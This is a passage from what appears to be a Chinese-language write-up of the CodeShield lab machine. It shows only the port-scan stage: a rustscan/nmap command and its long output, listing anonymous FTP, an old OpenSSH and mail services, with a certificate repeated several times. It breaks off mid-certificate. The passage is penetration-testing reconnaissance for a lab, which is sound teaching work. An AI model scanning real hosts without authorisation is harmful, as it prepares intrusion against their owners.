文章

CodeShield

发表于 更新于
作者 49 分钟阅读

CodeShield

image-20250530092047669

image-20250530093428006

image-20250530093443117

信息搜集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415

┌──(kali💀kali)-[~/temp/codeshield]
└─$ IP=10.0.2.22      
                                                                                                                                                                                             
┌──(kali💀kali)-[~/temp/codeshield]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'

Open 10.0.2.22:21
Open 10.0.2.22:22
Open 10.0.2.22:25
Open 10.0.2.22:110
Open 10.0.2.22:143
Open 10.0.2.22:443
Open 10.0.2.22:465
Open 10.0.2.22:80
Open 10.0.2.22:587
Open 10.0.2.22:993
Open 10.0.2.22:995
Open 10.0.2.22:2222
Open 10.0.2.22:3389
Open 10.0.2.22:22222

PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--    1 1002     1002      2349914 Aug 30  2023 CodeShield_pitch_deck.pdf
| -rw-rw-r--    1 1003     1003        67520 Aug 28  2023 Information_Security_Policy.pdf
|_-rw-rw-r--    1 1004     1004       226435 Aug 28  2023 The_2023_weak_password_report.pdf
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.0.2.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp    open  ssh           syn-ack OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 32:14:67:32:02:7a:b6:e4:7f:a7:22:0b:02:fd:ee:07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuHgUlIwWnDaiir2GGz0SZ364+nUeN06MhKR1Ahpj0qttOmTUXB45W9LOLALPxvRIWFsE7b04T5MK4kCvM4VwKai+n6ON4kEkAqImw8UDpviFSLn5+A19IkBkiDPUtm2G/DD+NTXj2w1TD2Pr1Wi6zY6tN3klkf6bkcszQ863BrGe5WHQhnNotc8+O5U8Fl01Fu46Pd6arpCpvaXgBL7h9eOcIHaTqComgbeDcrqmSiGM1RRzhh/er1WtfClT0bFjSCaDe5NpE0Oat92xzFuQ62c3Z5hqDfYLh6mkFGH062Lc4xkGS84q2GByWzvKgxXtAGDURdxGkpo0H9FAmuaKb
|   256 34:e4:d0:5d:bd:bc:9e:3f:4c:f9:1e:7d:3c:60:ce:6e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKw9aldAVwBR4fxzLD1Dqr4iBFV11fNBaZ+8pX4f1HDbPEscd2BkHMsYxR17e0zpSttM6DSfKT+YbLu2lDHWHmg=
|   256 ef:3c:ff:f9:9a:a3:aa:7d:5a:82:73:b9:8c:b8:97:04 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPXrs+Ma5M6viFKpjdt5NluM7u7W2jtKcyf4oe2UtFM+
25/tcp    open  smtp          syn-ack Postfix smtpd
|_smtp-commands: SMTP: EHLO 521 5.5.1 Protocol error\x0D
80/tcp    open  http          syn-ack nginx
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.0.2.22/
110/tcp   open  pop3          syn-ack Dovecot pop3d
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Issuer: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-26T09:34:43
| Not valid after:  2033-08-23T09:34:43
| MD5:   04aa:3069:8114:4330:b40e:52bc:e802:f76c
| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88
| -----BEGIN CERTIFICATE-----
| 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
| 1ZUy
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: TOP UIDL SASL STLS RESP-CODES CAPA AUTH-RESP-CODE PIPELINING
143/tcp   open  imap          syn-ack Dovecot imapd (Ubuntu)
|_imap-capabilities: IDLE SASL-IR more have ID post-login listed Pre-login ENABLE LOGINDISABLEDA0001 IMAP4rev1 capabilities OK LOGIN-REFERRALS LITERAL+ STARTTLS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Issuer: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-26T09:34:43
| Not valid after:  2033-08-23T09:34:43
| MD5:   04aa:3069:8114:4330:b40e:52bc:e802:f76c
| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88
| -----BEGIN CERTIFICATE-----
| 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
| 1ZUy
|_-----END CERTIFICATE-----
443/tcp   open  ssl/http      syn-ack nginx
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Issuer: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-26T09:34:43
| Not valid after:  2033-08-23T09:34:43
| MD5:   04aa:3069:8114:4330:b40e:52bc:e802:f76c
| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88
| -----BEGIN CERTIFICATE-----
| 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
| 1ZUy
|_-----END CERTIFICATE-----
|_http-title: CodeShield - Home
|_http-favicon: Unknown favicon MD5: 6BA827A71F6ECC3A5A21495F05755824
|_ssl-date: TLS randomness does not represent time
| http-methods: 
|_  Supported Methods: GET HEAD
| http-robots.txt: 1 disallowed entry 
|_/
465/tcp   open  ssl/smtp      syn-ack Postfix smtpd
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Issuer: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-26T09:34:43
| Not valid after:  2033-08-23T09:34:43
| MD5:   04aa:3069:8114:4330:b40e:52bc:e802:f76c
| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88
| -----BEGIN CERTIFICATE-----
| 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
| 1ZUy
|_-----END CERTIFICATE-----
|_smtp-commands: mail.codeshield.hmv, PIPELINING, SIZE 15728640, ETRN, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
|_ssl-date: TLS randomness does not represent time
587/tcp   open  smtp          syn-ack Postfix smtpd
| ssl-cert: Subject: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Issuer: commonName=mail.codeshield.hmv/organizationName=mail.codeshield.hmv/stateOrProvinceName=GuangDong/countryName=CN/localityName=ShenZhen/emailAddress=root@mail.codeshield.hmv/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-26T09:34:43
| Not valid after:  2033-08-23T09:34:43
| MD5:   04aa:3069:8114:4330:b40e:52bc:e802:f76c
| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88
| -----BEGIN CERTIFICATE-----
| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL
| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM
| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL
| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ
| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz
| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx
| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12
| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG
| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG
| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG
| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v
| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI
| 9G21uKbaLLVI/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc
| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c
| mQCns4N/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ
| xkbQDIEmSmaeoMD/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be
| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO/5
| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r
| 08WF/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S/+mCYuFfg5lx3ECV1piiW7
